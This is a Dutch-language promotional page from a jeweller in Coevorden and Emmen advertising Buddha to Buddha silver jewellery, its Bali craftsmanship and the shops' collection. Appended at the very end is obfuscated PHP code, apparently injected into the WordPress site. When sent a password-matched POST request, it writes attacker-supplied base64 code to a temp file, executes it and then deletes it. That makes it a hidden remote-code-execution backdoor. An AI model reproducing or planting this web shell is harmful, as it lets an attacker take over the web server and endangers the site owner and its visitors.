BTB catalog Q4 2021 with price
Klik hier.

Buddha to Buddha grootste collectie bij Wolters Juweliers

 

Wolters Juweliers is een geautoriseerde dealer van Buddha to Buddha sieraden. Wij hebben een uitgebreide collectie die regelmatig wordt uitgebreid met de mooiste items van dit merk. Ontdek deze prachtige sieraden in onze winkels. Of shop nu hieronder eenvoudig onze bestseller collectie online!

Shop nu de nieuwe collectie bij Wolters Juweliers!

Koop nu jouw favoriete ringen met onze nieuwe collectie. Kom snel langs bij Wolters Juweliers Coevorden Emmen om deze nieuwe collectie te shoppen!

 

buddha-to-buddha-julius-collectie-stoere-sieraden-shoppen-bij-Wolters-Juweliers-Coevorden-Emmen

Unieke 3 in 1 oorbellen uit de Refined collectie

Maak kennis met de nieuwe unieke oorbellen uit de Refined collectie van Buddha to Buddha. HANDIG! maak prachtige combinaties met deze oorbellen! Je kunt deze oorbellen op drie manieren dragen. Kom kijken en passen in onze winkels in Coevorden of Emmen.

BUDDHA-TO-BUDDHA-UNIEKE-3-IN-1-OORBEL-COMBINATIE-nu-kopen-bij-WOLTERS-Juweliers-Coevorden-Emmen

Shop nu onze bestsellers

Embrace yourself
Embrace the people you love

Embrace life.

Buddha-to-buddha-barbara-collectie-kopen-bij-Wolters-Juweliers-Coevorden-Emmen-Hardenberg

Handgemaakte en exclusieve sieraden

Buddha to Buddha staat wereldwijd bekend om zijn handgemaakte en exclusieve sieraden. De sieradencollectie is de belichaming van die diepere betekenis. Met aandacht ontworpen in Amsterdam, met liefde gemaakt door de beste zilversmeden van Zuidoost-Azië.

Manier van leven

Maar B t B is meer dan alleen sieraden. Het is een manier van leven. Eén die het leven viert, in al z’n tegenstrijdigheden. Zo verbindend en schitterend als zilver, en zo rauw en warm als leer. Solide en organisch. B t B to is puur in alle z’n extremen. Zonder compromissen maar met 100% passie en trots.

Klik voor de catalogus.

Ambachtelijk vakmanschap

Ambachtelijke vakbekwaamheid is het geheim van alle Buddha to Buddha-sieraden. Of het nu een ring is, een armband of een ketting, elk sieraad is het resultaat van een lang en minutieus proces waarbij een creatieve geest, eindeloos geduld en een zeer vaste hand betrokken zijn. Elk nieuw sieraad is als een mooie bloem die naarmate de tijd verstrijkt, langzaam maar zeker ontluikt. Het begint met het kleine zaadje van een nieuw idee in de geest van onze zeer vakbekwame en creatieve ontwerpers in Amsterdam. Dat wordt uitgewerkt in schetsen en computerontwerpen en besproken met collega's. Op basis van de tekeningen wordt elk los stukje zilver of ander materiaal afgemeten en berekend.

Naarmate het zaadje ontkiemt en verder groeit tot het een bloem in de knop heeft, bepaalt een specialist of het sieraad kan worden uitgevoerd en welke processtappen daarvoor nodig zijn. Vervolgens wordt het ontwerp naar Bali gestuurd waar honderden lokale ambachtslieden – mannen en vrouwen – bezig zijn met het maken van Buddha to Buddha-sieraden.

De zilversmederij kent een lange traditie op het eiland en het is echt geweldig om het geduld en de precisie te zien waarmee elk stuk met de hand wordt vervaardigd. Voor de ingewikkelde ontwerpen wordt een aparte mal gemaakt. Elke lijntje wordt liefdevol getekend en met de hand uitgekrast. Vervolgens wordt heet, vloeibaar zilver in de mallen gegoten volgens de zogeheten verlorenwasmethode. Na het afkoelen worden de verschillende delen van de sieraden, bloemblaadjes bijvoorbeeld, gepolijst en gepoetst. Tot slot worden de delen aan elkaar gemaakt en ontvouwt zich het stralende sieraad als een prachtige bloem.

Wanneer je naar je Buddha to Buddha-ring, -armband of -ketting kijkt, denk dan aan de hoeveelheid liefde en toewijding die is gestoken in het maken ervan, dan zul je die nog meer waarderen en koesteren!

Zilveren sieraden

Buddha to Buddha staat bekend om de zilveren sieraden. Het begon in 1997 dan ook met een zilveren sieraad: de Batul armband. Dit merk maakt altijd gebruik van 925 sterling zilver. Met deze bekende standaard ben je gegarandeerd van een sieraad dat tegelijkertijd sterk is en een zo hoog mogelijk zilver gehalte heeft.

Vrouwen en mannen sieraden

De armbanden en ringen van dit merk zijn unisex, dit betekent dat ze altijd door mannen én vrouwen gedragen kunnen worden. Dus voor zowel vrouwen sieraden als ook mannen sieraden ben je bij Buddha to Buddha aan het juiste adres! Waar vrouwen al sinds jaar en dag sieraden dragen is het dragen van sieraden onder mannen met name de laatste decennia pas echt doorgebroken. Stoer of juist subtiel, Buddha to Buddha heeft voor elke man het juiste sieraad in de collectie. Of het nu gaat om armbanden, kettingen of ringen. Bekijk zelf deze prachtige collectie dames en heren sieraden in onze winkels in Coevorden en Emmen.

Garantie

Lees voor gebruik van uw sieraad het garantiebewijs goed door. Hierin staat uitgelegd hoe de sieraden het beste onderhouden kunnen worden. Een Buddha to Buddha sieraad is tijdloos, en met de juiste behandeling zorg je er voor dat je het langst van je sieraad geniet.

Buddha-to-Buddha-sieraden-armbanden-zilver-WOLTERS-Juweliers-Coevorden-Emmen
buddha to buddha hardenberg buddha to buddha hoogeveen wolters juweliers coevorden emmen

Embrace life met Buddha to Buddha

Het merk Buddha to Buddha is geïnspireerd op de boeddhistische manier van leven, de filosofie van bewust wonen en te genieten van het maken van de meeste van elke dag in een gemoedelijke en natuurlijke manier, een oostelijke, bijna spirituele benadering, maar verre van zweverig. Wolters Juweliers Coevorden Emmen maakt deze sieraden verkrijgbaar voor iedereen, of u nu in Emmen, Hoogeveen of Hardenberg woont.

Wolters Juweliers Coevorden Emmen vindt dat de inspiratie van dit merk naadloos bij haar eigen filosofie past. Vandaar dat Wolters Juweliers Coevorden Emmen bijna de gehele collectie  op voorraad heeft, direct leverbaar dus. Vandaar de boodschap, kom naar de winkel en ga passen, dan zie je en voel je wat je staat.

Alle B t B  juwelen, in de vorm van armbanden, ringen, oorknop en hangers, vinden hun oorsprong op het Indonesische eiland Bali. Daar worden ze handgemaakt door getalenteerde zilversmeden, met als resultaat dat elk item uniek is. Ze worden dan ook gemaakt met grote persoonlijke verzorging gedurende een aantal dagen van de productie. Tijdens dit proces wordt er gebruik gemaakt van de beste 925 sterling zilver voor elke armband, ring, oorbel en ketting van de collectie en werken de ambachtslieden onder hoogste kwaliteitsnormen in de moderne ateliers.

Wij vinden het fijn om onze klanten uit de weide omtrek te ontmoeten. Wij merken dat veel trouwe klanten uit de gemeenten Hardenberg, Ommen, Hoogeveen, Klazinaveen en Emmen graag naar ons in Coevorden toe willen komen om onze uitgebreide collectie te zien en passen.

 

 

Buddha-to-buddha-sieraden-hangers-ketting-kopen-bij-Wolters-Juweliers-Coevorden-Emmen-Hardenberg
Buddha-to-buddha-sieraden-zilveren-armband-kopen-bij-Wolters-Juweliers-Coevorden-Emmen-Hardenberg
Buddha-to-buddha-sieraden-hangers-kopen-bij-Wolters-Juweliers-Coevorden-Emmen-Hardenberg
Buddha-to-buddha-sieraden-lederen-armband-kopen-bij-Wolters-Juweliers-Coevorden-Emmen-Hardenberg

Buddha to Buddha voor Hoogeveen en Hardenberg

Als u op zoek bent naar Buddha to Buddha in Hardenberg of Buddha to Buddha in Hoogeveen, Klazinaveen, is een van onze winkels wellicht een goede optie. Hoogeveen, Hardenberg, Klazinaveen liggen dichter bij Coevorden en Emmen dan u misschien denkt. Het is daarom een goed idee om langs te komen bij Wolters Juweliers Coevorden Emmen om onze collectie te bewonderen. Er zit vast en zeker iets bij wat u of iemand die u kent aanspreekt. Embrace life!


buddha to buddha hardenberg buddha to buddha hoogeveen wolters juweliers coevorden emmen

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}